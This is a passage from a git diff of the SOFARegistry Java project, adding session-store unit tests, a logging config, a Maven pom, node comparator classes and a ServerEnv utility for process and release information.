Subscriber(); + subscriber3.setScope(ScopeEnum.dataCenter); + subscriber3.setClientVersion(BaseInfo.ClientVersion.StoreData); + subscriber3.setDataInfoId(subscriber1.getDataInfoId()); + subscriber3.setDataId(subscriber1.getDataId()); + subscriber3.setRegisterId(subscriber1.getRegisterId()); + subscriber3.setSourceAddress(new URL("192.168.1.1", 12346)); + subscriber3.setTargetAddress(new URL("192.168.1.2", 9600)); + + Subscriber subscriber4 = new Subscriber(); + subscriber4.setScope(ScopeEnum.dataCenter); + subscriber4.setClientVersion(BaseInfo.ClientVersion.StoreData); + subscriber4.setDataInfoId(subscriber2.getDataInfoId()); + subscriber4.setDataId(subscriber2.getDataId()); + subscriber4.setRegisterId(subscriber2.getRegisterId()); + subscriber4.setSourceAddress(new URL("192.168.1.1", 12346)); + subscriber4.setTargetAddress(new URL("192.168.1.2", 9600)); + + sessionInterests.add(subscriber3); + sessionInterests.add(subscriber4); + + Assert.assertEquals( + sessionInterests + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 0); + Assert.assertEquals( + sessionInterests + .queryByConnectId(ConnectId.parse("192.168.1.1:12346_192.168.1.2:9600")) + .size(), + 2); + } + + @Test + public void testOverwriteSameConnectIdWatcher() { + + SessionWatchers sessionWatchers = new SessionWatchers(); + + Watcher watcher1 = new Watcher(); + watcher1.setDataInfoId("dataInfoId1"); + watcher1.setDataId("dataId1"); + watcher1.setRegisterId("RegisterId1"); + watcher1.setSourceAddress(new URL("192.168.1.1", 12345)); + watcher1.setTargetAddress(new URL("192.168.1.2", 9600)); + + Watcher watcher2 = new Watcher(); + watcher2.setDataInfoId("dataInfoId2"); + watcher2.setDataId("dataId2"); + watcher2.setRegisterId("RegisterId2"); + watcher2.setSourceAddress(new URL("192.168.1.1", 12345)); + watcher2.setTargetAddress(new URL("192.168.1.2", 9600)); + + sessionWatchers.add(watcher1); + sessionWatchers.add(watcher2); + + Assert.assertEquals( + sessionWatchers + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 2); + sessionWatchers.add(watcher2); + + Assert.assertEquals( + sessionWatchers + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 2); + + Watcher watcher3 = new Watcher(); + watcher3.setDataInfoId(watcher1.getDataInfoId()); + watcher3.setDataId(watcher1.getDataId()); + watcher3.setRegisterId(watcher1.getRegisterId()); + watcher3.setSourceAddress(new URL("192.168.1.1", 12346)); + watcher3.setTargetAddress(new URL("192.168.1.2", 9600)); + + Watcher watcher4 = new Watcher(); + watcher4.setDataInfoId(watcher2.getDataInfoId()); + watcher4.setDataId(watcher2.getDataId()); + watcher4.setRegisterId(watcher2.getRegisterId()); + watcher4.setSourceAddress(new URL("192.168.1.1", 12346)); + watcher4.setTargetAddress(new URL("192.168.1.2", 9600)); + + sessionWatchers.add(watcher3); + sessionWatchers.add(watcher4); + + Assert.assertEquals( + sessionWatchers + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 0); + Assert.assertEquals( + sessionWatchers + .queryByConnectId(ConnectId.parse("192.168.1.1:12346_192.168.1.2:9600")) + .size(), + 2); + } + + @Test + public void testSubAndClientOffUnorder() { + SessionInterests sessionInterests = new SessionInterests(); + SessionServerConfig config = new SessionServerConfigBean(null); + sessionInterests.setSessionServerConfig(config); + + Subscriber subscriber1 = new Subscriber(); + subscriber1.setScope(ScopeEnum.dataCenter); + subscriber1.setClientVersion(BaseInfo.ClientVersion.StoreData); + subscriber1.setDataInfoId("dataInfoId1"); + subscriber1.setDataId("dataId1"); + subscriber1.setRegisterId("RegisterId1"); + subscriber1.setSourceAddress(new URL("192.168.1.1", 12345)); + subscriber1.setTargetAddress(new URL("192.168.1.2", 9600)); + sessionInterests.add(subscriber1); + + Subscriber subscriber2 = new Subscriber(); + subscriber2.setScope(subscriber1.getScope()); + subscriber2.setClientVersion(subscriber1.getClientVersion()); + subscriber2.setDataInfoId(subscriber1.getDataInfoId()); + subscriber2.setDataId(subscriber1.getDataId()); + subscriber2.setRegisterId(subscriber1.getRegisterId()); + subscriber2.setSourceAddress(new URL("192.168.1.1", 12346)); + subscriber2.setTargetAddress(new URL("192.168.1.2", 9600)); + + sessionInterests.add(subscriber2); + + sessionInterests.deleteByConnectId( + ConnectId.parse( + subscriber1.getSourceAddress().getAddressString() + + "_" + + subscriber1.getTargetAddress().getAddressString())); + + Assert.assertEquals( + sessionInterests + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .isEmpty(), + true); + Assert.assertEquals( + sessionInterests + .queryByConnectId(ConnectId.parse("192.168.1.1:12346_192.168.1.2:9600")) + .size(), + 1); + + Map> addressMap = + getCacheSub(subscriber1.getDataInfoId(), subscriber1.getScope(), sessionInterests); + Assert.assertEquals(addressMap.get(new InetSocketAddress("192.168.1.1", 12345)), null); + Assert.assertEquals(addressMap.get(new InetSocketAddress("192.168.1.1", 12346)).size(), 1); + Assert.assertEquals(sessionInterests.getDatas(subscriber1.getDataInfoId()).size(), 1); + Assert.assertTrue(sessionInterests.getDatas(subscriber1.getDataInfoId()).contains(subscriber2)); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SessionInterestsTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SessionInterestsTest.java new file mode 100644 index 000000000..13211983a --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SessionInterestsTest.java @@ -0,0 +1,87 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.store; + +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.server.session.AbstractSessionServerTestBase; +import java.util.Collection; +import java.util.Map; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class SessionInterestsTest extends AbstractSessionServerTestBase { + + private SessionInterests interests = new SessionInterests(); + + @Before + public void beforeSessionInterestsTest() { + interests.setSessionServerConfig(sessionServerConfig); + } + + @Test + public void testAdd() { + Subscriber subscriber = randomSubscriber(); + Assert.assertNotNull(subscriber.getDataInfoId()); + Assert.assertTrue(interests.add(subscriber)); + Assert.assertTrue(interests.add(subscriber)); + } + + @Test + public void testCheckInterestVersion() { + Map map = interests.getInterestVersions(getDc()); + Assert.assertEquals(0, map.size()); + + Assert.assertSame( + Interests.InterestVersionCheck.NoSub, + interests.checkInterestVersion(getDc(), randomSubscriber().getDataInfoId(), 1L)); + String dataInfo = randomString(10); + String instanceId = randomString(10); + Subscriber subscriber = randomSubscriber(dataInfo, instanceId); + interests.add(subscriber); + Assert.assertEquals( + Interests.InterestVersionCheck.Interested, + interests.checkInterestVersion( + getDc(), + DataInfo.toDataInfoId(dataInfo, instanceId, "default-group"), + System.currentTimeMillis() + 100)); + + Assert.assertTrue(subscriber.checkAndUpdateVersion(getDc(), 100)); + Assert.assertEquals( + Interests.InterestVersionCheck.Obsolete, + interests.checkInterestVersion( + getDc(), DataInfo.toDataInfoId(dataInfo, instanceId, "default-group"), 80)); + + Subscriber subscriber2 = randomSubscriber(dataInfo, instanceId); + interests.add(subscriber2); + Collection neverPushed = interests.getInterestsNeverPushed(); + Assert.assertEquals(neverPushed.size(), 1); + Assert.assertEquals(neverPushed.iterator().next(), subscriber2); + + subscriber2.checkAndUpdateVersion(getDc(), 80); + + map = interests.getInterestVersions(getDc() + "1"); + Assert.assertEquals(map.size(), 1); + Assert.assertEquals(map.get(subscriber.getDataInfoId()).getValue(), 0); + + map = interests.getInterestVersions(getDc()); + Assert.assertEquals(map.size(), 1); + Assert.assertEquals(map.get(subscriber.getDataInfoId()).getValue(), 100); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SessionWatchersTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SessionWatchersTest.java new file mode 100644 index 000000000..ef72e3bd5 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SessionWatchersTest.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.store; + +import com.alipay.sofa.registry.common.model.store.Watcher; +import org.junit.Assert; +import org.junit.Test; + +public class SessionWatchersTest { + + @Test + public void test() { + final String dataInfoId = "testDataId"; + SessionWatchers watchers = new SessionWatchers(); + Assert.assertFalse(watchers.checkWatcherVersions(dataInfoId, 100)); + Watcher watcher = new Watcher(); + watcher.setDataInfoId(dataInfoId); + watcher.setRegisterId("testRegisterId"); + watchers.add(watcher); + Assert.assertTrue(watchers.checkWatcherVersions(dataInfoId, 100)); + Assert.assertFalse(watchers.checkWatcherVersions(dataInfoId, 80)); + Assert.assertTrue(watchers.checkWatcherVersions(dataInfoId, 200)); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SlotSessionDataStoreTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SlotSessionDataStoreTest.java new file mode 100644 index 000000000..023bc59d0 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/SlotSessionDataStoreTest.java @@ -0,0 +1,133 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.store; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import java.util.Collection; +import java.util.List; +import java.util.Map; +import java.util.Set; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class SlotSessionDataStoreTest { + @Test + public void test() { + SlotSessionDataStore store = new SlotSessionDataStore(); + store.slotTableCache = Mockito.mock(SlotTableCache.class); + Publisher publisher0 = TestUtils.createTestPublishers(0, 1).get(0); + Publisher publisher1 = TestUtils.createTestPublishers(1, 1).get(0); + Mockito.when(store.slotTableCache.slotOf(publisher0.getDataInfoId())).thenReturn(0); + Mockito.when(store.slotTableCache.slotOf(publisher1.getDataInfoId())).thenReturn(1); + + Assert.assertEquals(store.count(), 0); + store.add(publisher0); + store.add(publisher1); + Assert.assertEquals(store.count(), 2); + + Map> m = store.getDatas(); + Assert.assertEquals(m.size(), 2); + assertPublisher(m, publisher0); + assertPublisher(m, publisher1); + + Collection publishers = store.getDatas(publisher0.getDataInfoId()); + Assert.assertEquals(publishers.size(), 1); + Assert.assertTrue(publishers.contains(publisher0)); + + publishers = store.getDatas(publisher1.getDataInfoId()); + Assert.assertEquals(publishers.size(), 1); + Assert.assertTrue(publishers.contains(publisher1)); + + m = store.getDataInfoIdPublishers(0); + Assert.assertEquals(m.size(), 1); + assertPublisher(m, publisher0); + + m = store.getDataInfoIdPublishers(1); + Assert.assertEquals(m.size(), 1); + assertPublisher(m, publisher1); + + List list = store.getDataList(); + Assert.assertEquals(list.size(), 2); + Assert.assertTrue(list.contains(publisher0)); + Assert.assertTrue(list.contains(publisher1)); + + Collection dataInfoIds = store.getDataInfoIds(); + Assert.assertEquals(dataInfoIds.size(), 2); + Assert.assertTrue(dataInfoIds.contains(publisher0.getDataInfoId())); + Assert.assertTrue(dataInfoIds.contains(publisher1.getDataInfoId())); + + Set connectIds = store.getConnectIds(); + Assert.assertTrue(connectIds.size() <= 2); + Assert.assertTrue(connectIds.contains(publisher0.connectId())); + Assert.assertTrue(connectIds.contains(publisher1.connectId())); + + Set processIds = store.collectProcessIds(); + Assert.assertTrue(processIds.size() <= 2); + Assert.assertTrue(processIds.contains(publisher0.getProcessId())); + Assert.assertTrue(processIds.contains(publisher1.getProcessId())); + + Publisher query = store.queryById("1", "2"); + Assert.assertNull(query); + + query = store.queryById(publisher0.getRegisterId(), "2"); + Assert.assertNull(query); + + query = store.queryById("1", publisher0.getDataInfoId()); + Assert.assertNull(query); + + query = store.queryById(publisher0.getDataInfoId(), publisher0.getRegisterId()); + Assert.assertNull(query); + + query = store.queryById(publisher0.getRegisterId(), publisher0.getDataInfoId()); + Assert.assertEquals(query, publisher0); + + query = store.queryById(publisher1.getRegisterId(), publisher1.getDataInfoId()); + Assert.assertEquals(query, publisher1); + + Map map = store.queryByConnectId(ConnectId.of("xx:100", "yy:200")); + Assert.assertEquals(map.size(), 0); + + map = store.queryByConnectId(publisher0.connectId()); + Assert.assertEquals(map.get(publisher0.getRegisterId()), publisher0); + + map = store.queryByConnectId(publisher1.connectId()); + Assert.assertEquals(map.get(publisher1.getRegisterId()), publisher1); + + Assert.assertFalse(store.deleteById("1", "2")); + + Assert.assertTrue(store.deleteById(publisher0.getRegisterId(), publisher0.getDataInfoId())); + query = store.queryById(publisher0.getRegisterId(), publisher0.getDataInfoId()); + Assert.assertNull(query); + + query = store.queryById(publisher1.getRegisterId(), publisher1.getDataInfoId()); + Assert.assertNotNull(query); + + map = store.deleteByConnectId(publisher1.connectId()); + Assert.assertEquals(map.size(), 1); + Assert.assertEquals(map.get(publisher1.getRegisterId()), publisher1); + Assert.assertEquals(store.getDatas().size(), 0); + } + + private void assertPublisher(Map> m, Publisher publisher) { + Assert.assertEquals(m.get(publisher.getDataInfoId()).get(publisher.getRegisterId()), publisher); + Assert.assertEquals(m.get(publisher.getDataInfoId()).size(), 1); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSessionRegistryStrategyTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSessionRegistryStrategyTest.java new file mode 100644 index 000000000..ae3d27b87 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSessionRegistryStrategyTest.java @@ -0,0 +1,69 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.strategy.impl; + +import static org.junit.Assert.*; +import static org.mockito.Mockito.mock; + +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.session.AbstractSessionServerTestBase; +import com.alipay.sofa.registry.server.session.push.FirePushService; +import com.alipay.sofa.registry.task.listener.DefaultTaskListenerManager; +import com.alipay.sofa.registry.task.listener.TaskListenerManager; +import org.junit.Before; +import org.junit.Test; + +public class DefaultSessionRegistryStrategyTest extends AbstractSessionServerTestBase { + + private DefaultSessionRegistryStrategy strategy = new DefaultSessionRegistryStrategy(); + + private FirePushService firePushService; + + private TaskListenerManager taskListenerManager; + + @Before + public void beoforeDefaultSessionRegistryStrategyTest() { + firePushService = mock(FirePushService.class); + taskListenerManager = new DefaultTaskListenerManager(); + strategy + .setSessionServerConfig(sessionServerConfig) + .setFirePushService(firePushService) + .setTaskListenerManager(taskListenerManager); + } + + @Test + public void testAfterPublisherRegister() { + strategy.afterPublisherRegister(new Publisher()); + } + + @Test + public void testAfterSubscriberRegister() {} + + @Test + public void testAfterWatcherRegister() { + strategy.afterWatcherRegister(randomWatcher()); + } + + @Test + public void testAfterPublisherUnRegister() {} + + @Test + public void testAfterSubscriberUnRegister() {} + + @Test + public void testAfterWatcherUnRegister() {} +} diff --git a/server/server/session/src/test/resources/log4j2.xml b/server/server/session/src/test/resources/log4j2.xml new file mode 100644 index 000000000..f3708f4f5 --- /dev/null +++ b/server/server/session/src/test/resources/log4j2.xml @@ -0,0 +1,277 @@ + + + + + ~/logs/registry/session + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/server/session/src/test/resources/logback-test.xml b/server/server/session/src/test/resources/logback-test.xml deleted file mode 100644 index 5598cba71..000000000 --- a/server/server/session/src/test/resources/logback-test.xml +++ /dev/null @@ -1,27 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/server/server/shared/pom.xml b/server/server/shared/pom.xml new file mode 100644 index 000000000..86309357d --- /dev/null +++ b/server/server/shared/pom.xml @@ -0,0 +1,107 @@ + + + + registry-server + com.alipay.sofa + 6.0.1 + + 4.0.0 + + registry-server-shared + + ../../../ + + + + org.springframework.boot + spring-boot-starter + + + org.springframework.boot + spring-boot-starter-logging + + + + + org.springframework.boot + spring-boot-starter-log4j2 + + + + org.slf4j + jul-to-slf4j + + + com.alipay.sofa + registry-remoting-api + + + com.google.guava + guava + + + com.github.rholder + guava-retrying + + + com.alipay.sofa + registry-common-util + + + com.alipay.sofa + registry-remoting-bolt + + + com.alipay.sofa + registry-common-model + + + com.alipay.sofa + hessian + + + io.netty + netty-all + + + com.alipay.sofa + registry-remoting-http + + + org.hibernate + hibernate-validator + + + com.google.protobuf + protobuf-java + + + commons-lang + commons-lang + + + com.alipay.sofa + registry-store-common + + + com.alipay.sofa + registry-store-jraft + + + com.alipay.sofa + registry-store-jdbc + + + junit + junit + test + + + org.mockito + mockito-core + test + + + diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/AbstractComparator.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/AbstractComparator.java new file mode 100644 index 000000000..78012a3c2 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/AbstractComparator.java @@ -0,0 +1,67 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.comparator; + +import com.alipay.sofa.registry.common.model.Triple; +import java.util.Collection; +import java.util.HashSet; +import java.util.Set; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +public class AbstractComparator implements Comparator { + protected Set added = new HashSet<>(); + protected Set removed = new HashSet<>(); + protected Set remainings = new HashSet<>(); + protected volatile int count; + + @Override + public Set getAdded() { + return added; + } + + @Override + public Set getRemoved() { + return removed; + } + + @Override + public boolean hasAnyChange() { + return count > 0; + } + + @Override + public int totalChange() { + return count; + } + + protected Triple, Set, Set> getDiff( + Collection current, Collection future) { + + Set added = new HashSet<>(future); + Set remaining = new HashSet<>(future); + Set deleted = new HashSet<>(current); + + added.removeAll(deleted); + remaining.retainAll(deleted); + deleted.removeAll(future); + + return new Triple, Set, Set>(added, remaining, deleted); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/Comparator.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/Comparator.java new file mode 100644 index 000000000..f9a8f16c3 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/Comparator.java @@ -0,0 +1,34 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.comparator; + +import java.util.Set; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +public interface Comparator { + + Set getAdded(); + + Set getRemoved(); + + boolean hasAnyChange(); + + int totalChange(); +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/NodeComparator.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/NodeComparator.java new file mode 100644 index 000000000..9962569bb --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/comparator/NodeComparator.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.comparator; + +import com.alipay.sofa.registry.common.model.Triple; +import java.util.Collection; +import java.util.Set; + +/** + * @author chen.zhu + *

Jan 12, 2021 + *

String stands for data node ip + *

as the situation is mainly about rebalance the slot-table which, data node is stored just + * as IP address (String) + */ +public class NodeComparator extends AbstractComparator { + + private Collection prev; + + private Collection current; + + public NodeComparator(Collection prev, Collection current) { + this.prev = prev; + this.current = current; + compare(); + } + + public void compare() { + Triple, Set, Set> triple = getDiff(prev, current); + this.added = triple.getFirst(); + this.remainings = triple.getMiddle(); + this.removed = triple.getLast(); + this.count = this.added.size() + this.removed.size(); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/env/ServerEnv.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/env/ServerEnv.java new file mode 100644 index 000000000..878a32eaf --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/env/ServerEnv.java @@ -0,0 +1,96 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.env; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import java.io.InputStream; +import java.util.*; +import org.apache.commons.io.IOUtils; +import org.apache.commons.lang.StringUtils; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-28 15:25 yuzhi.lyz Exp $ + */ +public final class ServerEnv { + private static final Logger LOGGER = LoggerFactory.getLogger(ServerEnv.class); + + private ServerEnv() {} + + private static final String GIT_PROPS_FILE = "git.properties"; + public static final String IP = NetUtil.getLocalAddress().getHostAddress(); + public static final int PID = getPID(); + public static final ProcessId PROCESS_ID = createProcessId(); + + private static ProcessId createProcessId() { + Random random = new Random(); + return new ProcessId(IP, System.currentTimeMillis(), PID, random.nextInt(1024 * 8)); + } + + static int getPID() { + String processName = java.lang.management.ManagementFactory.getRuntimeMXBean().getName(); + if (StringUtils.isBlank(processName)) { + throw new RuntimeException("failed to get processName"); + } + + String[] processSplitName = processName.split("@"); + if (processSplitName.length == 0) { + throw new RuntimeException("failed to get processName"); + } + String pid = processSplitName[0]; + return Integer.parseInt(pid); + } + + public static boolean isLocalServer(String ip) { + return IP.equals(ip); + } + + public static Collection getMetaAddresses( + Map> metaMap, String localDataCenter) { + ParaCheckUtil.checkNotNull(metaMap, "metaNodes"); + ParaCheckUtil.checkNotNull(localDataCenter, "localDataCenter"); + + Collection addresses = metaMap.get(localDataCenter); + if (addresses == null || addresses.isEmpty()) { + throw new RuntimeException( + String.format("LocalDataCenter(%s) is not in metaNode", localDataCenter)); + } + return addresses; + } + + public static Map getReleaseProps() { + InputStream inputStream = ServerEnv.class.getClassLoader().getResourceAsStream(GIT_PROPS_FILE); + Properties properties = new Properties(); + if (inputStream != null) { + try { + properties.load(inputStream); + } catch (Throwable e) { + LOGGER.warn("failed to load release props file"); + } finally { + IOUtils.closeQuietly(inputStream); + } + } else { + LOGGER.warn( + "release props file not found:{}", ServerEnv.class.getClassLoader().getResource("/")); + } + return new TreeMap((Map) properties); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/AbstractMetaServerManager.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/AbstractMetaServerManager.java new file mode 100644 index 000000000..aaeff973d --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/AbstractMetaServerManager.java @@ -0,0 +1,239 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.meta; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.elector.LeaderInfo; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.exception.MetaLeaderQueryException; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Request; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.remoting.jersey.JerseyClient; +import com.alipay.sofa.registry.server.shared.remoting.ClientSideExchanger; +import com.alipay.sofa.registry.util.JsonUtils; +import com.github.rholder.retry.Retryer; +import com.github.rholder.retry.RetryerBuilder; +import com.github.rholder.retry.StopStrategies; +import com.github.rholder.retry.WaitStrategies; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.base.Predicate; +import java.util.Collection; +import java.util.Collections; +import java.util.Map; +import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; +import javax.annotation.Resource; +import javax.ws.rs.client.Client; +import org.apache.commons.lang.StringUtils; + +/** + * @author chen.zhu + *

